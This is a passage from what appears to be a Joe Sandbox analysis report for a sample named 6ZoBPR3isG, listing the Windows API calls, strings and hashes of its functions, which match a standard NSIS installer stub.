                                                                                                                • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                              • lstrcatW.KERNEL32(00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,00437800,761336C0,00435000,00000000), ref: 00403B59
                                                                                                              • lstrlenW.KERNEL32(004281E0,?,?,?,004281E0,00000000,00435800,00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,00437800), ref: 00403BD9
                                                                                                              • lstrcmpiW.KERNEL32(004281D8,.exe,004281E0,?,?,?,004281E0,00000000,00435800,00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403BEC
                                                                                                              • GetFileAttributesW.KERNEL32(004281E0), ref: 00403BF7
                                                                                                              • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,00435800), ref: 00403C40
                                                                                                                • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                                                                                              • RegisterClassW.USER32(004291E0), ref: 00403C7D
                                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C95
                                                                                                              • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CCA
                                                                                                              • ShowWindow.USER32(00000005,00000000), ref: 00403D00
                                                                                                              • GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403D2C
                                                                                                              • GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403D39
                                                                                                              • RegisterClassW.USER32(004291E0), ref: 00403D42
                                                                                                              • DialogBoxParamW.USER32(?,00000000,00403E86,00000000), ref: 00403D61
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                              • String ID: (7B$.DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                              • API String ID: 1975747703-1425696872
                                                                                                              • Opcode ID: fa642e9f5f159fa40c6df89367760cd7b58c30057714375835671963a1e6ccc9
                                                                                                              • Instruction ID: f49b718e50d7a26840138b6048ee10d29e8519d5aa43f5d66e73d4226ad9b376
                                                                                                              • Opcode Fuzzy Hash: fa642e9f5f159fa40c6df89367760cd7b58c30057714375835671963a1e6ccc9
                                                                                                              • Instruction Fuzzy Hash: FF61C470204700BBE220AF669E45F2B3A7CEB84B49F40447FF945B22E2DB7D5912C62D
                                                                                                              APIs
                                                                                                              • CheckDlgButton.USER32(?,-0000040A,?), ref: 004045BC
                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 004045D0
                                                                                                              • SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 004045ED
                                                                                                              • GetSysColor.USER32(?), ref: 004045FE
                                                                                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040460C
                                                                                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040461A
                                                                                                              • lstrlenW.KERNEL32(?), ref: 0040461F
                                                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040462C
                                                                                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404641
                                                                                                              • GetDlgItem.USER32(?,0000040A), ref: 0040469A
                                                                                                              • SendMessageW.USER32(00000000), ref: 004046A1
                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 004046CC
                                                                                                              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040470F
                                                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 0040471D
                                                                                                              • SetCursor.USER32(00000000), ref: 00404720
                                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00404739
                                                                                                              • SetCursor.USER32(00000000), ref: 0040473C
                                                                                                              • SendMessageW.USER32(00000111,?,00000000), ref: 0040476B
                                                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040477D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                              • String ID: N
                                                                                                              • API String ID: 3103080414-1130791706
                                                                                                              • Opcode ID: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                                                                              • Instruction ID: 26ae409e5f73424340e4bb55f347a499eb46e427c8d4328441e026d38e95c6c2
                                                                                                              • Opcode Fuzzy Hash: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                                                                              • Instruction Fuzzy Hash: 4B6173B1900209BFDB109F60DD85EAA7B69FB84314F00853AFB05772E0D7789D52CB58
                                                                                                              APIs
                                                                                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                              • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                              • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                              • DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                              • String ID: F
                                                                                                              • API String ID: 941294808-1304234792
                                                                                                              • Opcode ID: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                                              • Instruction ID: b35030fe9107d9a8359b932f7918d2348922827c9ca57aaae851fe5b21190c6b
                                                                                                              • Opcode Fuzzy Hash: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                                              • Instruction Fuzzy Hash: 92418A71800249AFCF058FA5DE459AFBBB9FF44310F00842AF991AA1A0C738E955DFA4
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,000003FB), ref: 0040489F
                                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 004048C9
                                                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 0040497A
                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00404985
                                                                                                              • lstrcmpiW.KERNEL32(004281E0,00423728,00000000,?,?), ref: 004049B7
                                                                                                              • lstrcatW.KERNEL32(?,004281E0), ref: 004049C3
                                                                                                              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049D5
                                                                                                                • Part of subcall function 00405A32: GetDlgItemTextW.USER32(?,?,00000400,00404A0C), ref: 00405A45
                                                                                                                • Part of subcall function 0040667C: CharNextW.USER32(?,*?|<>/":,00000000,00000000,00437800,00437800,00435000,00403480,00437800,761336C0,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                                                                                • Part of subcall function 0040667C: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                                                                                • Part of subcall function 0040667C: CharNextW.USER32(?,00000000,00437800,00437800,00435000,00403480,00437800,761336C0,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                                                                                • Part of subcall function 0040667C: CharPrevW.USER32(?,?,00437800,00437800,00435000,00403480,00437800,761336C0,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                                                                              • GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,?,004216F8,?,?,000003FB,?), ref: 00404A98
                                                                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404AB3
                                                                                                                • Part of subcall function 00404C0C: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                                                • Part of subcall function 00404C0C: wsprintfW.USER32 ref: 00404CB6
                                                                                                                • Part of subcall function 00404C0C: SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                              • String ID: (7B$A
                                                                                                              • API String ID: 2624150263-3645020878
                                                                                                              • Opcode ID: e24882e00550f6ead3a1036a7d6e943431ff60c63dfc37ca84bce6dbb49f36c9
                                                                                                              • Instruction ID: 217fbe9c53fcac7a38d38ba6b36a95d3c52d9e466bb1b0d29fe77156d884dce9
                                                                                                              • Opcode Fuzzy Hash: e24882e00550f6ead3a1036a7d6e943431ff60c63dfc37ca84bce6dbb49f36c9
                                                                                                              • Instruction Fuzzy Hash: 01A161F1A00205ABDB11EFA5C985AAF77B8EF84315F10803BF611B62D1D77C9A418B6D
                                                                                                              APIs
                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,?,004061CF,?,?), ref: 0040606F
                                                                                                              • GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00406078
                                                                                                                • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                                • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                              • GetShortPathNameW.KERNEL32(?,004275C8,00000400), ref: 00406095
                                                                                                              • wsprintfA.USER32 ref: 004060B3
                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 004060EE
                                                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060FD
                                                                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406135
                                                                                                              • SetFilePointer.KERNEL32(0040A590,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A590,00000000,[Rename],00000000,00000000,00000000), ref: 0040618B
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 0040619C
                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061A3
                                                                                                                • Part of subcall function 00405EDE: GetFileAttributesW.KERNEL32(00000003,00402F73,00438800,80000000,00000003), ref: 00405EE2
                                                                                                                • Part of subcall function 00405EDE: CreateFileW.KERNEL32(?,?,?,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                              • String ID: %ls=%ls$[Rename]
                                                                                                              • API String ID: 2171350718-461813615
                                                                                                              • Opcode ID: 743beb3988d04f7b57c6902fe00ffd967832125f1abdce8c9c4456724f210b8f
                                                                                                              • Instruction ID: 8c4bc4cab4d3408e43c29de3b383fd3cef376d344e04ab2aaf2f470794b42cbb
                                                                                                              • Opcode Fuzzy Hash: 743beb3988d04f7b57c6902fe00ffd967832125f1abdce8c9c4456724f210b8f
                                                                                                              • Instruction Fuzzy Hash: 34313770200719BFD2206B619D48F6B3A6CEF45704F16043EFA46FA2D3DA3C99158ABD
                                                                                                              APIs
                                                                                                              • GetTickCount.KERNEL32 ref: 00402F44
                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,00438800,00000400), ref: 00402F60
                                                                                                                • Part of subcall function 00405EDE: GetFileAttributesW.KERNEL32(00000003,00402F73,00438800,80000000,00000003), ref: 00405EE2
                                                                                                                • Part of subcall function 00405EDE: CreateFileW.KERNEL32(?,?,?,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,00438800,00438800,80000000,00000003), ref: 00402FA9
                                                                                                              • GlobalAlloc.KERNEL32(00000040,0040A230), ref: 004030F0
                                                                                                              Strings
                                                                                                              • soft, xrefs: 00403020
                                                                                                              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403187
                                                                                                              • Null, xrefs: 00403029
                                                                                                              • Inst, xrefs: 00403017
                                                                                                              • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403139
                                                                                                              • Error launching installer, xrefs: 00402F80
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                              • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                              • API String ID: 2803837635-787788815
                                                                                                              • Opcode ID: da7d1d4a2d7cfe0a4d95b8b78dbffc0a58d971e607472f26681b65440013a3aa
                                                                                                              • Instruction ID: fab51a6d61a7302470dd91ad27108f0c0be819ae48098b15a947b51e22d3bd00
                                                                                                              • Opcode Fuzzy Hash: da7d1d4a2d7cfe0a4d95b8b78dbffc0a58d971e607472f26681b65440013a3aa
                                                                                                              • Instruction Fuzzy Hash: 4961D271A00205ABDB20DFA4DD45A9A7BA8EB04356F20413FF904F62D1DB7C9A458BAD
                                                                                                              APIs
                                                                                                              • GetSystemDirectoryW.KERNEL32(004281E0,00000400), ref: 0040654B
                                                                                                              • GetWindowsDirectoryW.KERNEL32(004281E0,00000400,00000000,00422708,?,00405487,00422708,00000000), ref: 0040655E
                                                                                                              • SHGetSpecialFolderLocation.SHELL32(00405487,00000000,00000000,00422708,?,00405487,00422708,00000000), ref: 0040659A
                                                                                                              • SHGetPathFromIDListW.SHELL32(00000000,004281E0), ref: 004065A8
                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 004065B3
                                                                                                              • lstrcatW.KERNEL32(004281E0,\Microsoft\Internet Explorer\Quick Launch), ref: 004065D9
                                                                                                              • lstrlenW.KERNEL32(004281E0,00000000,00422708,?,00405487,00422708,00000000), ref: 00406631
                                                                                                              Strings
                                                                                                              • Software\Microsoft\Windows\CurrentVersion, xrefs: 0040651B
                                                                                                              • \Microsoft\Internet Explorer\Quick Launch, xrefs: 004065D3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                              • API String ID: 717251189-730719616
                                                                                                              • Opcode ID: fadb749951e57590abd2d4ee5972ead553d40ab2c5c4ce1725a089f13c923e34
                                                                                                              • Instruction ID: bd17f2555f8fb0ecb5cfb39a154c1e2018f2892b34e65fa403921cbdc39efe9b
                                                                                                              • Opcode Fuzzy Hash: fadb749951e57590abd2d4ee5972ead553d40ab2c5c4ce1725a089f13c923e34
                                                                                                              • Instruction Fuzzy Hash: A4612371A00115ABDF209F64DD41AAE37A5AF50314F62813FE903B72D0E73E9AA2C75D
                                                                                                              APIs
                                                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 004043E3
                                                                                                              • GetSysColor.USER32(00000000), ref: 00404421
                                                                                                              • SetTextColor.GDI32(?,00000000), ref: 0040442D
                                                                                                              • SetBkMode.GDI32(?,?), ref: 00404439
                                                                                                              • GetSysColor.USER32(?), ref: 0040444C
                                                                                                              • SetBkColor.GDI32(?,?), ref: 0040445C
                                                                                                              • DeleteObject.GDI32(?), ref: 00404476
                                                                                                              • CreateBrushIndirect.GDI32(?), ref: 00404480
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 2320649405-0
                                                                                                              • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                              • Instruction ID: 4d8d1a64c5805e8a020b3744e793f2033a9a6b6b0a681029562fed9dd316a9da
                                                                                                              • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                              • Instruction Fuzzy Hash: 722131715007049BCB319F68D948B5BBBF8AF81714B148A2EEE96E26E0D738D944CB54
                                                                                                              APIs
                                                                                                              • ReadFile.KERNEL32(?,?,?,?), ref: 004026B6
                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 004026F1
                                                                                                              • SetFilePointer.KERNEL32(?,?,?,?,?,00000008,?,?,?,?), ref: 00402714
                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 0040272A
                                                                                                                • Part of subcall function 00405FBF: SetFilePointer.KERNEL32(?,00000000,00000000,?), ref: 00405FD5
                                                                                                              • SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 004027D6
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                              • String ID: 9
                                                                                                              • API String ID: 163830602-2366072709
                                                                                                              • Opcode ID: 1fdfab34e77cf90ebe23e3371142485a67670726d5f4eeccdfcf92a02d0001b8
                                                                                                              • Instruction ID: add249696b334c0fceafe0529c612de3b1c59f5eaafd60b3ba6c21ea99dd66a9
                                                                                                              • Opcode Fuzzy Hash: 1fdfab34e77cf90ebe23e3371142485a67670726d5f4eeccdfcf92a02d0001b8
                                                                                                              • Instruction Fuzzy Hash: FD510A74D10219AEDF21DF95DA88AAEB779FF04304F50443BE901B72D0D7B89982CB59
                                                                                                              APIs
                                                                                                              • lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                              • lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                              • lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                              • SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                              • String ID:
                                                                                                              • API String ID: 2531174081-0
                                                                                                              • Opcode ID: b84216cbe2d5722ff5c8c30ae43643c8050e8425152119dcc0cd5bf76baef7c3
                                                                                                              • Instruction ID: e73fa1987b6059f35b704de59c80f6892b54c3d1ee51518932a2041d94d0b0cb
                                                                                                              • Opcode Fuzzy Hash: b84216cbe2d5722ff5c8c30ae43643c8050e8425152119dcc0cd5bf76baef7c3
                                                                                                              • Instruction Fuzzy Hash: BE21A171900558BACB119F95DD84ACFBFB5EF84314F10803AF904B22A1C3798A91CFA8
                                                                                                              APIs
                                                                                                              • DestroyWindow.USER32(?,00000000), ref: 00402EA9
                                                                                                              • GetTickCount.KERNEL32 ref: 00402EC7
                                                                                                              • wsprintfW.USER32 ref: 00402EF5
                                                                                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                                • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                                • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                              • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402F19
                                                                                                              • ShowWindow.USER32(00000000,00000005), ref: 00402F27
                                                                                                                • Part of subcall function 00402E72: MulDiv.KERNEL32(?,00000064,?), ref: 00402E87
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                              • String ID: ... %d%%
                                                                                                              • API String ID: 722711167-2449383134
                                                                                                              • Opcode ID: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                                                                              • Instruction ID: c65c9f61eb329069142d3a49436c3393aeffd9891ae55f37d91fa0e4ac25720a
